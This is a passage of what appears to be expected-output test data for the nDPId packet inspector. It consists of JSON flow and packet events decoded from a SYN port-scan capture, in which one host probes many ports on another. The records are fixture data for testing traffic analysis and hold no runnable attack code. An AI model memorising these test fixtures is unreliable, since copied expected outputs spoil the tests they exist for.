-00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1946,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1936,"flow_packet_id":1,"flow_last_seen":1278275061313,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061313,"pkt":"ACYLMQczACWzv5HuCABFAAAs8oIAACYGL\/CsEAAIQA2GNIzSB0fdUoMYAAAAAGACDAAlSAAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1947,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1937,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061313,"flow_last_seen":1278275061313,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061313,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2401,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1947,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1937,"flow_packet_id":1,"flow_last_seen":1278275061313,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061313,"pkt":"ACYLMQczACWzv5HuCABFAAAsznsAACkGUPesEAAIQA2GNIzSCWHdUoMYAAAAAGACCAAnLgAAAgQFtA=="} 
-00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1948,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1938,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061313,"flow_last_seen":1278275061313,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061313,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3031,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1948,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1938,"flow_packet_id":1,"flow_last_seen":1278275061313,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061313,"pkt":"ACYLMQczACWzv5HuCABFAAAsFp8AACUGDNSsEAAIQA2GNIzSC9fdUoMYAAAAAGACCAAkuAAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1949,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1939,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061313,"flow_last_seen":1278275061313,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061313,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":306,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1949,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1939,"flow_packet_id":1,"flow_last_seen":1278275061313,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061313,"pkt":"ACYLMQczACWzv5HuCABFAAAspUsAACUGfiesEAAIQA2GNIzSATLdUoMYAAAAAGACCAAvXQAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1950,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1940,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061313,"flow_last_seen":1278275061313,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061313,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1812,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1950,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1940,"flow_packet_id":1,"flow_last_seen":1278275061313,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061313,"pkt":"ACYLMQczACWzv5HuCABFAAAsYO4AACkGvoSsEAAIQA2GNIzSBxTdUoMYAAAAAGACCAApewAAAgQFtA=="} 
-00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1951,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1941,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061313,"flow_last_seen":1278275061313,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061313,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1104,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1951,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1941,"flow_packet_id":1,"flow_last_seen":1278275061313,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061313,"pkt":"ACYLMQczACWzv5HuCABFAAAsubMAADUGWb+sEAAIQA2GNIzSBFDdUoMYAAAAAGACCAAsPwAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1952,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1942,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061313,"flow_last_seen":1278275061313,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061313,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2718,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1952,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1942,"flow_packet_id":1,"flow_last_seen":1278275061313,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061313,"pkt":"ACYLMQczACWzv5HuCABFAAAsfYYAADMGl+ysEAAIQA2GNIzSCp7dUoMYAAAAAGACEAAd8QAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1953,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1943,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061313,"flow_last_seen":1278275061313,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061313,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1110,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1953,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1943,"flow_packet_id":1,"flow_last_seen":1278275061313,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061313,"pkt":"ACYLMQczACWzv5HuCABFAAAscmYAACoGrAysEAAIQA2GNIzSBFbdUoMYAAAAAGACDAAoOQAAAgQFtA=="} 
-00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1954,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1944,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061313,"flow_last_seen":1278275061313,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061313,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6005,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1954,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1944,"flow_packet_id":1,"flow_last_seen":1278275061313,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061313,"pkt":"ACYLMQczACWzv5HuCABFAAAsltUAADUGfJ2sEAAIQA2GNIzSF3XdUoMYAAAAAGACCAAZGgAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1955,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1945,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061313,"flow_last_seen":1278275061313,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061313,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2034,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1955,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1945,"flow_packet_id":1,"flow_last_seen":1278275061313,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061313,"pkt":"ACYLMQczACWzv5HuCABFAAAskLgAADgGf7qsEAAIQA2GNIzSB\/LdUoMYAAAAAGACBAAsnQAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1956,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1946,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061313,"flow_last_seen":1278275061313,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061313,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5269,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1956,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1946,"flow_packet_id":1,"flow_last_seen":1278275061313,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061313,"pkt":"ACYLMQczACWzv5HuCABFAAAsULwAADcGwLasEAAIQA2GNIzSFJXdUoMYAAAAAGACEAAT+gAAAgQFtA=="} 
-00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1957,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1947,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061313,"flow_last_seen":1278275061313,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061313,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5962,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1957,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1947,"flow_packet_id":1,"flow_last_seen":1278275061313,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061313,"pkt":"ACYLMQczACWzv5HuCABFAAAsuIAAACYGafKsEAAIQA2GNIzSF0rdUoMYAAAAAGACDAAVRQAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1958,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1948,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061314,"flow_last_seen":1278275061314,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061314,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3268,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1958,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1948,"flow_packet_id":1,"flow_last_seen":1278275061314,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061314,"pkt":"ACYLMQczACWzv5HuCABFAAAsa\/cAACkGs3usEAAIQA2GNIzSDMTdUoMYAAAAAGACCAAjywAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1959,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1949,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061314,"flow_last_seen":1278275061314,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061314,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1044,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1959,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1949,"flow_packet_id":1,"flow_last_seen":1278275061314,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061314,"pkt":"ACYLMQczACWzv5HuCABFAAAsYnoAACkGvPisEAAIQA2GNIzSBBTdUoMYAAAAAGACCAAsewAAAgQFtA=="} 
-00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1960,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1950,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061314,"flow_last_seen":1278275061314,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061314,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":512,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1960,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1950,"flow_packet_id":1,"flow_last_seen":1278275061314,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061314,"pkt":"ACYLMQczACWzv5HuCABFAAAs0v0AADYGP3WsEAAIQA2GNIzSAgDdUoMYAAAAAGACDAAqjwAAAgQFtA=="} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1961,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1951,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061314,"flow_last_seen":1278275061314,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061314,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":49157,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1961,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1951,"flow_packet_id":1,"flow_last_seen":1278275061314,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061314,"pkt":"ACYLMQczACWzv5HuCABFAAAsecQAADIGnK6sEAAIQA2GNIzSwAXdUoMYAAAAAGACDABsiQAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1962,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1952,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061314,"flow_last_seen":1278275061314,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061314,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3261,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1962,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1952,"flow_packet_id":1,"flow_last_seen":1278275061314,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061314,"pkt":"ACYLMQczACWzv5HuCABFAAAss3cAADAGZPusEAAIQA2GNIzSDL3dUoMYAAAAAGACBAAn0gAAAgQFtA=="} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1963,"source":"synscan.pcap","alias":"nDPId-test","flow_id":40,"flow_packet_id":3,"flow_last_seen":1278275061338,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1278275061338,"pkt":"ACWzv5HuACYLMQczCABFAAAsAABAADYG0nJADYY0rBAACAAWjNIpZyOl3VKDGWASFtDU2wAAAgQFZAAA"} 
-00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1964,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1953,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061357,"flow_last_seen":1278275061357,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061357,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6666,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1964,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1953,"flow_packet_id":1,"flow_last_seen":1278275061357,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061357,"pkt":"ACYLMQczACWzv5HuCABFAAAsgRIAACoGnWCsEAAIQA2GNIzTGgrdU4MZAAAAAGACDAASggAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1965,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1954,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061357,"flow_last_seen":1278275061357,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061357,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":311,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1965,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1954,"flow_packet_id":1,"flow_last_seen":1278275061357,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061357,"pkt":"ACYLMQczACWzv5HuCABFAAAsvUQAACYGZS6sEAAIQA2GNIzTATfdU4MZAAAAAGACDAArVQAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1966,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1955,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061357,"flow_last_seen":1278275061357,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061357,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2725,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1966,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1955,"flow_packet_id":1,"flow_last_seen":1278275061357,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061357,"pkt":"ACYLMQczACWzv5HuCABFAAAsHykAADQG9UmsEAAIQA2GNIzTCqXdU4MZAAAAAGACBAAp5wAAAgQFtA=="} 
-00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1967,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1956,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061357,"flow_last_seen":1278275061357,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061357,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8084,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1967,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1956,"flow_packet_id":1,"flow_last_seen":1278275061357,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061357,"pkt":"ACYLMQczACWzv5HuCABFAAAsL60AACgG8MWsEAAIQA2GNIzTH5TdU4MZAAAAAGACBAAU+AAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1968,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1957,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061357,"flow_last_seen":1278275061357,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061357,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":90,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1968,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1957,"flow_packet_id":1,"flow_last_seen":1278275061357,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061357,"pkt":"ACYLMQczACWzv5HuCABFAAAsXrcAACYGw7usEAAIQA2GNIzTAFrdU4MZAAAAAGACDAAsMgAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1969,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1958,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061358,"flow_last_seen":1278275061358,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061358,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":563,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1969,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1958,"flow_packet_id":1,"flow_last_seen":1278275061358,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061358,"pkt":"ACYLMQczACWzv5HuCABFAAAs\/GMAAC4GHg+sEAAIQA2GNIzTAjPdU4MZAAAAAGACDAAqWQAAAgQFtA=="} 
-00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1970,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1959,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061358,"flow_last_seen":1278275061358,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061358,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9877,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1970,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1959,"flow_packet_id":1,"flow_last_seen":1278275061358,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061358,"pkt":"ACYLMQczACWzv5HuCABFAAAs3yEAADoGL1GsEAAIQA2GNIzTJpXdU4MZAAAAAGACDAAF9wAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1971,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1960,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061358,"flow_last_seen":1278275061358,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061358,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1984,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
